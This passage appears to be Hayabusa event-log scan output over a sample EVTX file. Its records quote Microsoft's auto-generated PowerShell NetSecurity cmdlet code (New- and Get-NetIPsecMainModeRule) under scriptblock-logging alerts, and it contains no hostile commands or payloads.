[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } 
else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false 
if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
